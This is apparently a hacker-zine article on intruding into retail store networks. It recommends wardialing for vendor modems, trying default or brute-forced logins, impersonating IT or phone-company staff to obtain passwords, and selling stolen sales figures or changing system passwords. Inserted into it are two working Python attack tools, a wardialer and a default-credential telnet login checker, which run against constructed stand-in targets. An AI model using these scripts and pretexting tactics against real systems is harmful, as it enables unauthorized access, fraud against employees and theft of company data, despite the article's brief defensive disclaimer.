Shopping for a Security Flaw? Try Retail

by dead_pilgrim

Author's Note:  System vulnerabilities described in this article should be used for the sole purpose of improving and fortifying weak systems, and not to inflict harm, steal, or act in any other malicious fashion.

Within the past few months I have discovered that there are serious security holes within retail store systems and networks.  The flaws range from open modem ports to computer-ignorant employees, any of which could hand you the keys to the kingdom.

Let's take a look at open modems, meaning modems that are set up for remote service by vendors or by the company's own tech support staff.

These modems are installed with most systems.  They are usually set up when the store first opens, or when the network is first built, and after that they rarely see any use at all.  You can use a wardialing program like PhoneSweep to harvest modem numbers, then determine whether you can connect to a retail store's system.  Within a three-hour sweep, I found eight modems connected to various retail systems, all of which accepted incoming calls!
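What a wardialer like PhoneSweep actually does is a simple loop over a block of numbers: dial each one with a Hayes "ATDT" command, read the modem's result code, and keep the numbers that answer with CONNECT.  The following is an added example written for this article, not code from PhoneSweep or from the author; the modem it talks to is a constructed stand-in that answers AT commands the way a Hayes-compatible modem does, so it runs offline.  Swapping the stand-in for a real serial port (for instance a pyserial Serial object, which has the same write/readline methods) is an assumption, as is the "555" prefix and the numbers in the sample answer table.

```python
"""Minimal wardialer loop (added example).  The modem is a constructed fake that
answers AT commands; a real serial port with write()/readline() can replace it."""
import re

# Hayes result codes a modem returns after ATDT<number>.  Only CONNECT means a
# data modem picked up; the others are still recorded so the number is not
# redialed.  The regex tolerates a trailing speed, e.g. "CONNECT 9600".
RESULT_RE = re.compile(
    r"^(CONNECT(?: \d+)?|NO CARRIER|BUSY|NO ANSWER|NO DIALTONE|VOICE|OK|ERROR)\b"
)

# Constructed sample data: which numbers in the block answer with what.
SAMPLE_ANSWERS = {
    "5550012": "CONNECT 9600",
    "5550020": "BUSY",
    "5550031": "CONNECT",
}


class FakeModem:
    """Constructed stand-in for a serial modem with echo off (ATE0).
    `answers` maps a dialed number to the result code it produces."""

    def __init__(self, answers):
        self.answers = answers
        self.log = []          # every command the dialer sent, for inspection
        self._pending = b""

    def write(self, data):
        self.log.append(data)
        cmd = data.decode().strip()
        if cmd.startswith("ATDT"):
            number = cmd[4:]
            self._pending = (self.answers.get(number, "NO ANSWER") + "\r\n").encode()
        else:                  # ATZ, ATH, +++ and friends just acknowledge
            self._pending = b"OK\r\n"

    def readline(self):
        line, self._pending = self._pending, b""
        return line


def dial(modem, number, max_lines=20):
    """Dial one number and return the bare result code ('CONNECT', 'BUSY', ...).
    Returns 'TIMEOUT' if no recognizable code arrives within max_lines reads."""
    modem.write(f"ATDT{number}\r".encode())
    for _ in range(max_lines):
        line = modem.readline().decode(errors="replace").strip()
        if not line:
            continue           # blank line or an echoed command; keep reading
        m = RESULT_RE.match(line)
        if not m:
            continue
        code = "CONNECT" if m.group(1).startswith("CONNECT") else m.group(1)
        if code == "CONNECT":
            # A real modem is now in data mode: send the +++ escape (with its
            # guard time) before ATH, or the hang-up command is sent down the line.
            modem.write(b"+++")
            modem.readline()
            modem.write(b"ATH\r")
            modem.readline()
        return code
    return "TIMEOUT"


def sweep(modem, prefix, start, end):
    """Dial prefix + NNNN for every NNNN in [start, end]; return {number: code}."""
    results = {}
    for n in range(start, end + 1):
        number = f"{prefix}{n:04d}"
        results[number] = dial(modem, number)
    return results


def carriers(results):
    """The numbers worth a second look: those that answered with a carrier."""
    return sorted(num for num, code in results.items() if code == "CONNECT")


if __name__ == "__main__":
    found = sweep(FakeModem(SAMPLE_ANSWERS), "555", 0, 40)
    print("carriers:", carriers(found))
```

Note that a sweep like this is trivially visible to anyone reading the store's phone bill or the PBX call logs: sequential calls of a few seconds each from one origin are the classic wardial signature, which is also what a defender should look for.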

What can you do with these modems?

Well, one could download a program called ZOC (this program, as well as PhoneSweep, is available from download.com, Kazaa, or eMule).  This program is very useful in this situation.  It lets you connect to the modem by dial-up and emulate a number of different terminal types.  Many retail systems use Telnet or a plain TTY login.  Again, you can experiment with the emulation settings to see what works best.

Many major retailers use HP 9000 or IBM servers running UNIX or Windows NT.  They usually use Cisco routers (the 2600 or 2500 models are standard issue).  You would think that a smart business would put a firewall in front of all this, right?  Not usually.  Seven out of the eight systems that I found during the wardial session were not protected by a firewall.  The most common method of protection was a username and password.

Logins on these systems usually require a username and a password.  One could use a brute-force attack, a dictionary attack, or simply try the default password.

That's right!  Many systems still have the default usernames and passwords set.  If you search within Google Groups you can more than likely find a list of the default passwords.  If these do not work one could always use social engineering to obtain a username and password.  Some companies have in-store employees who perform updates on these systems, and they are familiar with the passwords.  Or you might try to get a system password from a regular sales associate.
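Trying a default-password list against a TTY-style login is mechanical: connect, wait for the "login:" prompt, send the username, wait for "Password:", send the password, and decide from what comes back.  The example below is added here and is not the author's code or any vendor's; both the credential list and the telnet-style login service it talks to are constructed for the demonstration (the service runs in-process on 127.0.0.1, and which account it accepts is made up).  Two things a practitioner wants that the article only implies are built in: the checker stops at the first hit, and it stops the moment the host starts refusing logins, because a real system with lockout enabled turns a sloppy dictionary run into a denial of service against the store.  A real telnetd also sends IAC option negotiation bytes ahead of its banner, which this stand-in does not; stripping or answering them is left as an assumption.

```python
"""Default-credential check against a telnet/TTY-style login (added example).
The login service here is a constructed stand-in listening on 127.0.0.1."""
import socket
import threading

# Constructed sample list, the kind of thing the article says turns up on
# Google Groups.  These pairs are illustrative, not documented retail defaults.
DEFAULT_CREDS = [
    ("root", "root"),
    ("admin", "admin"),
    ("service", "service"),
    ("guest", "guest"),
]

# Markers that end a login attempt: a shell prompt, a rejection, or a lockout.
SHELL_PROMPTS = (b"$ ", b"# ")
LOCKED_MARKER = b"Too many failures"
END_MARKERS = SHELL_PROMPTS + (b"Login incorrect", LOCKED_MARKER)


class FakeTelnetLogin(threading.Thread):
    """Constructed stand-in for a UNIX-style login on a serial/telnet port.
    Accepts the accounts in `accounts`; refuses everything after `lockout`
    failed attempts, the way a host with lockout configured would."""

    def __init__(self, accounts, lockout=3):
        super().__init__(daemon=True)
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))       # OS picks a free port
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.accounts = accounts
        self.lockout = lockout
        self.failures = 0

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            threading.Thread(target=self.serve, args=(conn,), daemon=True).start()

    def serve(self, conn):
        with conn:
            f = conn.makefile("rwb", buffering=0)
            if self.failures >= self.lockout:
                f.write(LOCKED_MARKER + b"\r\n")
                return
            f.write(b"store01 login: ")          # constructed banner
            user = f.readline().strip().decode(errors="replace")
            f.write(b"Password: ")
            password = f.readline().strip().decode(errors="replace")
            if self.accounts.get(user) == password:
                f.write(b"\r\n$ ")                # shell prompt: we are in
            else:
                self.failures += 1
                f.write(b"\r\nLogin incorrect\r\n")


def read_until(sock, markers, timeout=2.0):
    """Collect bytes until any marker appears, the peer closes, or we time out."""
    sock.settimeout(timeout)
    buf = b""
    while not any(m in buf for m in markers):
        try:
            chunk = sock.recv(1024)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def try_login(host, port, user, password):
    """Drive one login exchange.  Returns 'ok', 'fail' or 'locked'."""
    with socket.create_connection((host, port), timeout=3) as s:
        banner = read_until(s, (b"login: ", LOCKED_MARKER))
        if LOCKED_MARKER in banner:
            return "locked"
        s.sendall(user.encode() + b"\r\n")
        read_until(s, (b"Password: ",))
        s.sendall(password.encode() + b"\r\n")
        reply = read_until(s, END_MARKERS)
    if LOCKED_MARKER in reply:
        return "locked"
    if any(reply.endswith(p) for p in SHELL_PROMPTS):
        return "ok"
    return "fail"


def check_defaults(host, port, creds=DEFAULT_CREDS):
    """Try each pair once, in order; stop on the first success or on lockout.
    Returns [(user, password, result), ...] for every attempt made."""
    attempts = []
    for user, password in creds:
        result = try_login(host, port, user, password)
        attempts.append((user, password, result))
        if result in ("ok", "locked"):
            break
    return attempts


if __name__ == "__main__":
    srv = FakeTelnetLogin({"service": "service"})   # constructed target
    srv.start()
    for attempt in check_defaults("127.0.0.1", srv.port):
        print(attempt)
```

The ordering of the list matters more than its length: put the vendor's documented service account first, and never loop a long wordlist against a port like this without knowing the lockout policy, since an authorized test that locks the store's register server out of its own support account has done the attacker's job for them.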

A majority of these employees are computer illiterate.  You could easily call the store claiming to be with the company's IT department, ask to speak with whoever handles the store's computer system, and engineer a password out of them.  Retail stores usually do not hire in-house techs.

Retail store networks and servers contain a literal cornucopia of information ranging from sales information to server access.  I'm sure that the competition would be very interested in sales figures, movement of product, or some new marketing idea that the company is about to deploy.  This is where it hurts the most.  Most companies work hard to keep sales figures under lock and key, and it's sadly ironic that someone could possibly access this sensitive information from the comfort of their own home.

Sometimes you can also gain access to the store's PBX system.

The most common PBX system used in retailers is the Lucent Definity series.  The operation manuals for the Lucent PBX systems are available from Lucent's website in PDF format.  If you read these manuals, you will find that there are all kinds of awesome things that you can do with these systems.  I'm going to save this subject for a later article.

Granted that not every hacker is interested in the sales figures or marketing information of the local Shoe Emporium, but someone could make a cool amount of cash selling this information.

As long as there is competition there will always be a market for this kind of industrial espionage.  If they were not interested in selling this information, they could always create some serious havoc, such as removing network devices or changing store system passwords.

I wonder if I put on a Verizon, SBC, or AT&T shirt and hat (which you could probably find at your local Salvation Army), walked into the local super shopping center, and asked to see the store's network or telephone system, how far I would actually get.  Since most of these people are improperly trained, I'm sure I could infiltrate the system very easily.

Most of these store systems are designed and set up by very inexperienced system architects, which makes the perfect environment for security holes.  Perhaps they should start thinking on the defensive.  What self-respecting corporation would allow themselves to be brought to their knees by some hacker that found an extremely obvious security hole?
